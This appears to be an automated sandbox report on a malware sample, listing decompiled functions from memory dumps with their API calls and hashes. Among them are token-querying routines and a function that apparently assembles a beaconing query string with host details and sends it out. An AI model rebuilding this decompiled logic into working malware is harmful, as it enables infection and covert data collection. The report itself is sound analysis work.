                                                          • Instruction ID: 1fa8499a3fb9d870af32cd8dd494677d3c5752d4faa86cbdfe48f08298b98997
                                                          • Opcode Fuzzy Hash: aff55e964845c7660d28dc52922bb2547b3814d710ef77c2359d3cc72c3601bc
                                                          • Instruction Fuzzy Hash: 8FF0FEF150430CBFD3106F66DCC4C27BBACFB95299B118A2EF64682611D676B84A8A60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E047F1B42() {
                                                          				void* _t1;
                                                          				intOrPtr _t5;
                                                          				void* _t6;
                                                          				void* _t7;
                                                          				void* _t11;
                                                          
                                                          				_t1 =  *0x47fd26c; // 0x2c8
                                                          				if(_t1 == 0) {
                                                          					L8:
                                                          					return 0;
                                                          				}
                                                          				SetEvent(_t1);
                                                          				_t11 = 0x7fffffff;
                                                          				while(1) {
                                                          					SleepEx(0x64, 1);
                                                          					_t5 =  *0x47fd2bc; // 0x0
                                                          					if(_t5 == 0) {
                                                          						break;
                                                          					}
                                                          					_t11 = _t11 - 0x64;
                                                          					if(_t11 > 0) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				_t6 =  *0x47fd26c; // 0x2c8
                                                          				if(_t6 != 0) {
                                                          					CloseHandle(_t6);
                                                          				}
                                                          				_t7 =  *0x47fd238; // 0x4ef0000
                                                          				if(_t7 != 0) {
                                                          					HeapDestroy(_t7);
                                                          				}
                                                          				goto L8;
                                                          			}









                                                          APIs
                                                          • SetEvent.KERNEL32(000002C8,00000001,047F4F0E), ref: 047F1B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 047F1B5C
                                                          • CloseHandle.KERNEL32(000002C8), ref: 047F1B7D
                                                          • HeapDestroy.KERNEL32(04EF0000), ref: 047F1B8D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: 4659a856360212cf153415897acd8fc959c571b2f946fbbaf505c48732245be9
                                                          • Instruction ID: 7242c8ae94543f572d8f85c0cd71e10fb707b3a5388b80e961c4b3f57fd6ae72
                                                          • Opcode Fuzzy Hash: 4659a856360212cf153415897acd8fc959c571b2f946fbbaf505c48732245be9
                                                          • Instruction Fuzzy Hash: 98F03071B11311DBEB205BB9ED48E963B98FB04771B488614BD05D7384EB78EC4597A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E047F23F4(void** __esi) {
                                                          				char* _v0;
                                                          				intOrPtr _t4;
                                                          				intOrPtr _t6;
                                                          				void* _t8;
                                                          				intOrPtr _t11;
                                                          				void* _t12;
                                                          				void** _t14;
                                                          
                                                          				_t14 = __esi;
                                                          				_t4 =  *0x47fd32c; // 0x52e95b0
                                                          				__imp__(_t4 + 0x40);
                                                          				while(1) {
                                                          					_t6 =  *0x47fd32c; // 0x52e95b0
                                                          					_t1 = _t6 + 0x58; // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t8 =  *_t14;
                                                          				if(_t8 != 0 && _t8 != 0x47fd030) {
                                                          					HeapFree( *0x47fd238, 0, _t8);
                                                          				}
                                                          				_t14[1] = E047F486F(_v0, _t14);
                                                          				_t11 =  *0x47fd32c; // 0x52e95b0
                                                          				_t12 = _t11 + 0x40;
                                                          				__imp__(_t12);
                                                          				return _t12;
                                                          			}











                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(052E9570), ref: 047F23FD
                                                          • Sleep.KERNEL32(0000000A,?,047F5D25), ref: 047F2407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,047F5D25), ref: 047F242F
                                                          • RtlLeaveCriticalSection.NTDLL(052E9570), ref: 047F244B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 74d2e4919e6ed11a7b7feddfb13239283ebcb11831c064cb43ed4ea792f1b60b
                                                          • Instruction ID: 75d94da8021709d75257ddf1ac2b7fe54c2bc58c32c60bf827df35aead1e9fbf
                                                          • Opcode Fuzzy Hash: 74d2e4919e6ed11a7b7feddfb13239283ebcb11831c064cb43ed4ea792f1b60b
                                                          • Instruction Fuzzy Hash: 9EF03A70600140DFE721DF68ED48F9A77E4FF18741B00C800FA02C6351D768EC41EA55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E047F6702() {
                                                          				void* _v0;
                                                          				void** _t3;
                                                          				void** _t5;
                                                          				void** _t7;
                                                          				void** _t8;
                                                          				void* _t10;
                                                          
                                                          				_t3 =  *0x47fd32c; // 0x52e95b0
                                                          				__imp__( &(_t3[0x10]));
                                                          				while(1) {
                                                          					_t5 =  *0x47fd32c; // 0x52e95b0
                                                          					_t1 =  &(_t5[0x16]); // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t7 =  *0x47fd32c; // 0x52e95b0
                                                          				_t10 =  *_t7;
                                                          				if(_t10 != 0 && _t10 != 0x47fe81a) {
                                                          					HeapFree( *0x47fd238, 0, _t10);
                                                          					_t7 =  *0x47fd32c; // 0x52e95b0
                                                          				}
                                                          				 *_t7 = _v0;
                                                          				_t8 =  &(_t7[0x10]);
                                                          				__imp__(_t8);
                                                          				return _t8;
                                                          			}










                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(052E9570), ref: 047F670B
                                                          • Sleep.KERNEL32(0000000A,?,047F5D25), ref: 047F6715
                                                          • HeapFree.KERNEL32(00000000,?,?,047F5D25), ref: 047F6743
                                                          • RtlLeaveCriticalSection.NTDLL(052E9570), ref: 047F6758
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 1c44efb08cebc7151da96128cd1ae0362d2afe0d55bb30f36efade294f6c39aa
                                                          • Instruction ID: b39d9bad62584ddb64c50fa42ac5a54a5cf5af0056c8c73f2a6e7ae500cd43ce
                                                          • Opcode Fuzzy Hash: 1c44efb08cebc7151da96128cd1ae0362d2afe0d55bb30f36efade294f6c39aa
                                                          • Instruction Fuzzy Hash: 05F0B2B4600100DFE7298B64DD99F9977E9FF08711B04C419EA02D73A0D638AC02DA20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E047F5AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                          				intOrPtr* _v8;
                                                          				void* _t17;
                                                          				intOrPtr* _t22;
                                                          				void* _t27;
                                                          				char* _t30;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				void* _t36;
                                                          				void* _t37;
                                                          				void* _t39;
                                                          				int _t42;
                                                          
                                                          				_t17 = __eax;
                                                          				_t37 = 0;
                                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                          				_t2 = _t17 + 1; // 0x1
                                                          				_t28 = _t2;
                                                          				_t34 = E047FA71F(_t2);
                                                          				if(_t34 != 0) {
                                                          					_t30 = E047FA71F(_t28);
                                                          					if(_t30 == 0) {
                                                          						E047FA734(_t34);
                                                          					} else {
                                                          						_t39 = _a4;
                                                          						_t22 = E047FA782(_t39);
                                                          						_v8 = _t22;
                                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                          							_a4 = _t39;
                                                          						} else {
                                                          							_t26 = _t22 + 2;
                                                          							_a4 = _t22 + 2;
                                                          							_t22 = E047FA782(_t26);
                                                          							_v8 = _t22;
                                                          						}
                                                          						if(_t22 == 0) {
                                                          							__imp__(_t34, _a4);
                                                          							 *_t30 = 0x2f;
                                                          							 *((char*)(_t30 + 1)) = 0;
                                                          						} else {
                                                          							_t42 = _t22 - _a4;
                                                          							memcpy(_t34, _a4, _t42);
                                                          							 *((char*)(_t34 + _t42)) = 0;
                                                          							__imp__(_t30, _v8);
                                                          						}
                                                          						 *_a8 = _t34;
                                                          						_t37 = 1;
                                                          						 *_a12 = _t30;
                                                          					}
                                                          				}
                                                          				return _t37;
                                                          			}















                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,047F3E08,?,?,?,?,00000102,047F67B8,?,?,00000000), ref: 047F5AFD
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                            • Part of subcall function 047FA782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,047F5B2B,00000000,00000001,00000001,?,?,047F3E08,?,?,?,?,00000102), ref: 047FA790
                                                            • Part of subcall function 047FA782: StrChrA.SHLWAPI(?,0000003F,?,?,047F3E08,?,?,?,?,00000102,047F67B8,?,?,00000000,00000000), ref: 047FA79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047F3E08,?,?,?,?,00000102,047F67B8,?), ref: 047F5B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 047F5B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 047F5B77
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: c8b525d82762111a442d3b8851a0c16ba4863dc5ccf45bba5fb890e6ec24743b
                                                          • Instruction ID: 66dff234a5ba07e29bbfe2cf426d9045cf6ff3e43a00fb7fbf7bd7f31cc7c4ff
                                                          • Opcode Fuzzy Hash: c8b525d82762111a442d3b8851a0c16ba4863dc5ccf45bba5fb890e6ec24743b
                                                          • Instruction Fuzzy Hash: 7F21AF76514259FFDB126F74CC48EAABFB9EF06294B148054FA099F302E634E90197F0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E047F45C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                          				void* _v8;
                                                          				void* _t18;
                                                          				int _t25;
                                                          				int _t29;
                                                          				int _t34;
                                                          
                                                          				_t29 = lstrlenW(_a4);
                                                          				_t25 = lstrlenW(_a8);
                                                          				_t18 = E047FA71F(_t25 + _t29 + _t25 + _t29 + 2);
                                                          				_v8 = _t18;
                                                          				if(_t18 != 0) {
                                                          					_t34 = _t29 + _t29;
                                                          					memcpy(_t18, _a4, _t34);
                                                          					_t10 = _t25 + 2; // 0x2
                                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                          				}
                                                          				return _v8;
                                                          			}









                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,052E935C,?,047F8D93,004F0053,052E935C,?,?,?,?,?,?,047F523E), ref: 047F45D6
                                                          • lstrlenW.KERNEL32(047F8D93,?,047F8D93,004F0053,052E935C,?,?,?,?,?,?,047F523E), ref: 047F45DD
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,047F8D93,004F0053,052E935C,?,?,?,?,?,?,047F523E), ref: 047F45FD
                                                          • memcpy.NTDLL(74B069A0,047F8D93,00000002,00000000,004F0053,74B069A0,?,?,047F8D93,004F0053,052E935C), ref: 047F4610
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: d7d48c752d277fc75eef2971f2876876fa2d302bbd01ea976d12485b02559417
                                                          • Instruction ID: dd84e7238fd3962cc551bc6187e2c746cd3a103bd56705d7a22c4cfcb501a14c
                                                          • Opcode Fuzzy Hash: d7d48c752d277fc75eef2971f2876876fa2d302bbd01ea976d12485b02559417
                                                          • Instruction Fuzzy Hash: 30F0FF76900119BBDF11EFE9CC48CDF7BACEF492647154462EA04D7301E635EA159BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(052E9A78,00000000,00000000,7742C740,047F20ED,00000000), ref: 047F362A
                                                          • lstrlen.KERNEL32(?), ref: 047F3632
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • lstrcpy.KERNEL32(00000000,052E9A78), ref: 047F3646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 047F3651
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: a16217d9abfdd86b75dbf1622795a97663d7c5c78297c55d089b68c2b26dba4c
                                                          • Instruction ID: c0390c2a8340e34de292333f178248094e55e5560c548f4655cd5c545ecc4c23
                                                          • Opcode Fuzzy Hash: a16217d9abfdd86b75dbf1622795a97663d7c5c78297c55d089b68c2b26dba4c
                                                          • Instruction Fuzzy Hash: AEE012735016256B8712ABE8AC48CAFBBADFF896617044817FB01D3210C7299C069BE5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          C-Code - Quality: 38%
                                                          			E04475A27(char _a4, void* _a8) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				char _v16;
                                                          				void* _v20;
                                                          				char _v24;
                                                          				char _v28;
                                                          				char _v32;
                                                          				char _v36;
                                                          				char _v40;
                                                          				void* _v44;
                                                          				void** _t33;
                                                          				void* _t40;
                                                          				void* _t43;
                                                          				void** _t44;
                                                          				intOrPtr* _t47;
                                                          				char _t48;
                                                          
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v20 = _a4;
                                                          				_t48 = 0;
                                                          				_v16 = 0;
                                                          				_a4 = 0;
                                                          				_v44 = 0x18;
                                                          				_v40 = 0;
                                                          				_v32 = 0;
                                                          				_v36 = 0;
                                                          				_v28 = 0;
                                                          				_v24 = 0;
                                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                          					_t33 =  &_v8;
                                                          					__imp__(_v12, 8, _t33);
                                                          					if(_t33 >= 0) {
                                                          						_t47 = __imp__;
                                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                          						_t44 = E0447A71F(_a4);
                                                          						if(_t44 != 0) {
                                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                          							if(_t40 >= 0) {
                                                          								memcpy(_a8,  *_t44, 0x1c);
                                                          								_t48 = 1;
                                                          							}
                                                          							E0447A734(_t44);
                                                          						}
                                                          						NtClose(_v8); // executed
                                                          					}
                                                          					NtClose(_v12);
                                                          				}
                                                          				return _t48;
                                                          			}

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04475A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04475A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04475A9D
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04475ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04475AC7
                                                          • NtClose.NTDLL(?), ref: 04475AD9
                                                          • NtClose.NTDLL(00000000), ref: 04475AE3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: f57b61c69cea5a09fd4f64374dcbef774896cd1fd6eb3a9b2fe2d6b21c52ecee
                                                          • Instruction ID: 03d1814f19125f8e3021e876aad524f91477f6bccd3ada995031b032be8174ed
                                                          • Opcode Fuzzy Hash: f57b61c69cea5a09fd4f64374dcbef774896cd1fd6eb3a9b2fe2d6b21c52ecee
                                                          • Instruction Fuzzy Hash: 6821E772900218FBEF01AFA5CC85ADEBFBDEB48750F104026F605E6150D7759A459BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E04474AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                          				void* _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				void* _v24;
                                                          				void* _v28;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				long _t59;
                                                          				intOrPtr _t60;
                                                          				intOrPtr _t61;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t63;
                                                          				intOrPtr _t64;
                                                          				void* _t67;
                                                          				intOrPtr _t68;
                                                          				int _t71;
                                                          				void* _t72;
                                                          				void* _t73;
                                                          				void* _t75;
                                                          				void* _t78;
                                                          				intOrPtr _t82;
                                                          				intOrPtr _t86;
                                                          				intOrPtr* _t88;
                                                          				void* _t94;
                                                          				intOrPtr _t100;
                                                          				signed int _t104;
                                                          				char** _t106;
                                                          				int _t109;
                                                          				signed int _t111;
                                                          				intOrPtr* _t112;
                                                          				intOrPtr* _t114;
                                                          				intOrPtr* _t116;
                                                          				intOrPtr* _t118;
                                                          				intOrPtr _t121;
                                                          				intOrPtr _t126;
                                                          				int _t130;
                                                          				CHAR* _t132;
                                                          				intOrPtr _t133;
                                                          				void* _t134;
                                                          				void* _t143;
                                                          				int _t144;
                                                          				void* _t145;
                                                          				intOrPtr _t146;
                                                          				void* _t148;
                                                          				long _t152;
                                                          				intOrPtr* _t153;
                                                          				intOrPtr* _t154;
                                                          				intOrPtr* _t157;
                                                          				void* _t158;
                                                          				void* _t160;
                                                          
                                                          				_t143 = __edx;
                                                          				_t134 = __ecx;
                                                          				_t59 = __eax;
                                                          				_v12 = 8;
                                                          				if(__eax == 0) {
                                                          					_t59 = GetTickCount();
                                                          				}
                                                          				_t60 =  *0x447d018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t61 =  *0x447d014; // 0x3a87c8cd
                                                          				_t132 = _a16;
                                                          				asm("bswap eax");
                                                          				_t62 =  *0x447d010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t63 = E0447D00C; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t64 =  *0x447d2a8; // 0xb9a5a8
                                                          				_t3 = _t64 + 0x447e633; // 0x74666f73
                                                          				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x447d02c,  *0x447d004, _t59);
                                                          				_t67 = E044756CD();
                                                          				_t68 =  *0x447d2a8; // 0xb9a5a8
                                                          				_t4 = _t68 + 0x447e673; // 0x74707526
                                                          				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                          				_t160 = _t158 + 0x38;
                                                          				_t145 = _t144 + _t71; // executed
                                                          				_t72 = E044758DB(_t134); // executed
                                                          				_t133 = __imp__;
                                                          				_v8 = _t72;
                                                          				if(_t72 != 0) {
                                                          					_t126 =  *0x447d2a8; // 0xb9a5a8
                                                          					_t7 = _t126 + 0x447e8d4; // 0x736e6426
                                                          					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                          					_t160 = _t160 + 0xc;
                                                          					_t145 = _t145 + _t130;
                                                          					HeapFree( *0x447d238, 0, _v8);
                                                          				}
                                                          				_t73 = E0447A199();
                                                          				_v8 = _t73;
                                                          				if(_t73 != 0) {
                                                          					_t121 =  *0x447d2a8; // 0xb9a5a8
                                                          					_t11 = _t121 + 0x447e8dc; // 0x6f687726
                                                          					wsprintfA(_t145 + _a16, _t11, _t73);
                                                          					_t160 = _t160 + 0xc;
                                                          					HeapFree( *0x447d238, 0, _v8);
                                                          				}
                                                          				_t146 =  *0x447d32c; // 0x50195b0
                                                          				_t75 = E04474622(0x447d00a, _t146 + 4);
                                                          				_t152 = 0;
                                                          				_v20 = _t75;
                                                          				if(_t75 == 0) {
                                                          					L26:
                                                          					RtlFreeHeap( *0x447d238, _t152, _a16); // executed
                                                          					return _v12;
                                                          				} else {
                                                          					_t78 = RtlAllocateHeap( *0x447d238, 0, 0x800);
                                                          					_v8 = _t78;
                                                          					if(_t78 == 0) {
                                                          						L25:
                                                          						HeapFree( *0x447d238, _t152, _v20);
                                                          						goto L26;
                                                          					}
                                                          					E0447518F(GetTickCount());
                                                          					_t82 =  *0x447d32c; // 0x50195b0
                                                          					__imp__(_t82 + 0x40);
                                                          					asm("lock xadd [eax], ecx");
                                                          					_t86 =  *0x447d32c; // 0x50195b0
                                                          					__imp__(_t86 + 0x40);
                                                          					_t88 =  *0x447d32c; // 0x50195b0
                                                          					_t148 = E04471BB6(1, _t143, _a16,  *_t88);
                                                          					_v28 = _t148;
                                                          					asm("lock xadd [eax], ecx");
                                                          					if(_t148 == 0) {
                                                          						L24:
                                                          						HeapFree( *0x447d238, _t152, _v8);
                                                          						goto L25;
                                                          					}
                                                          					StrTrimA(_t148, 0x447c28c);
                                                          					_push(_t148);
                                                          					_t94 = E0447361A();
                                                          					_v16 = _t94;
                                                          					if(_t94 == 0) {
                                                          						L23:
                                                          						HeapFree( *0x447d238, _t152, _t148);
                                                          						goto L24;
                                                          					}
                                                          					_t153 = __imp__;
                                                          					 *_t153(_t148, _a4);
                                                          					 *_t153(_v8, _v20);
                                                          					_t154 = __imp__;
                                                          					 *_t154(_v8, _v16);
                                                          					_t100 = E04479070( *_t154(_v8, _t148), _v8);
                                                          					_a4 = _t100;
                                                          					if(_t100 == 0) {
                                                          						_v12 = 8;
                                                          						L21:
                                                          						E04476761();
                                                          						L22:
                                                          						HeapFree( *0x447d238, 0, _v16);
                                                          						_t152 = 0;
                                                          						goto L23;
                                                          					}
                                                          					_t104 = E044769B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
                                                          					_v12 = _t104;
                                                          					if(_t104 == 0) {
                                                          						_t157 = _v24;
                                                          						_t111 = E0447391F(_t157, _a4, _a8, _a12); // executed
                                                          						_v12 = _t111;
                                                          						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                          						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                          						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                          						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                          						_t118 =  *_t157;
                                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                          						E0447A734(_t157);
                                                          					}
                                                          					if(_v12 != 0x10d2) {
                                                          						L16:
                                                          						if(_v12 == 0) {
                                                          							_t106 = _a8;
                                                          							if(_t106 != 0) {
                                                          								_t149 =  *_t106;
                                                          								_t155 =  *_a12;
                                                          								wcstombs( *_t106,  *_t106,  *_a12);
                                                          								_t109 = E04475800(_t149, _t149, _t155 >> 1);
                                                          								_t148 = _v28;
                                                          								 *_a12 = _t109;
                                                          							}
                                                          						}
                                                          						goto L19;
                                                          					} else {
                                                          						if(_a8 != 0) {
                                                          							L19:
                                                          							E0447A734(_a4);
                                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                                          								goto L22;
                                                          							} else {
                                                          								goto L21;
                                                          							}
                                                          						}
                                                          						_v12 = _v12 & 0x00000000;
                                                          						goto L16;
                                                          					}
                                                          				}
                                                          			}
                                                          0x04474c42
                                                          0x04474d6b
                                                          0x04474d75
                                                          0x00000000
                                                          0x04474d75
                                                          0x04474c4e
                                                          0x04474c54
                                                          0x04474c55
                                                          0x04474c5a
                                                          0x04474c5f
                                                          0x04474d61
                                                          0x04474d69
                                                          0x00000000
                                                          0x04474d69
                                                          0x04474c68
                                                          0x04474c6f
                                                          0x04474c77
                                                          0x04474c7c
                                                          0x04474c85
                                                          0x04474c90
                                                          0x04474c95
                                                          0x04474c9a
                                                          0x04474d99
                                                          0x04474d4d
                                                          0x04474d4d
                                                          0x04474d52
                                                          0x04474d5d
                                                          0x04474d5f
                                                          0x00000000
                                                          0x04474d5f
                                                          0x04474ca4
                                                          0x04474ca9
                                                          0x04474cae
                                                          0x04474cb3
                                                          0x04474cbe
                                                          0x04474cc3
                                                          0x04474cc6
                                                          0x04474ccc
                                                          0x04474cd2
                                                          0x04474cd8
                                                          0x04474cdb
                                                          0x04474ce1
                                                          0x04474ce4
                                                          0x04474ce9
                                                          0x04474ced
                                                          0x04474ced
                                                          0x04474cf9
                                                          0x04474d05
                                                          0x04474d09
                                                          0x04474d0b
                                                          0x04474d10
                                                          0x04474d12
                                                          0x04474d17
                                                          0x04474d1c
                                                          0x04474d29
                                                          0x04474d31
                                                          0x04474d34
                                                          0x04474d34
                                                          0x04474d10
                                                          0x00000000
                                                          0x04474cfb
                                                          0x04474cff
                                                          0x04474d36
                                                          0x04474d39
                                                          0x04474d42
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04474d42
                                                          0x04474d01
                                                          0x00000000
                                                          0x04474d01
                                                          0x04474cf9

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04474ACA
                                                          • wsprintfA.USER32 ref: 04474B1A
                                                          • wsprintfA.USER32 ref: 04474B37
                                                          • wsprintfA.USER32 ref: 04474B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04474B75
                                                          • wsprintfA.USER32 ref: 04474B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04474BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04474BD4
                                                          • GetTickCount.KERNEL32 ref: 04474BE5
                                                          • RtlEnterCriticalSection.NTDLL(05019570), ref: 04474BF9
                                                          • RtlLeaveCriticalSection.NTDLL(05019570), ref: 04474C17
                                                            • Part of subcall function 04471BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,044720C2,?,050195B0), ref: 04471BE1
                                                            • Part of subcall function 04471BB6: lstrlen.KERNEL32(?,?,?,044720C2,?,050195B0), ref: 04471BE9
                                                            • Part of subcall function 04471BB6: strcpy.NTDLL ref: 04471C00
                                                            • Part of subcall function 04471BB6: lstrcat.KERNEL32(00000000,?), ref: 04471C0B
                                                            • Part of subcall function 04471BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,044720C2,?,050195B0), ref: 04471C28
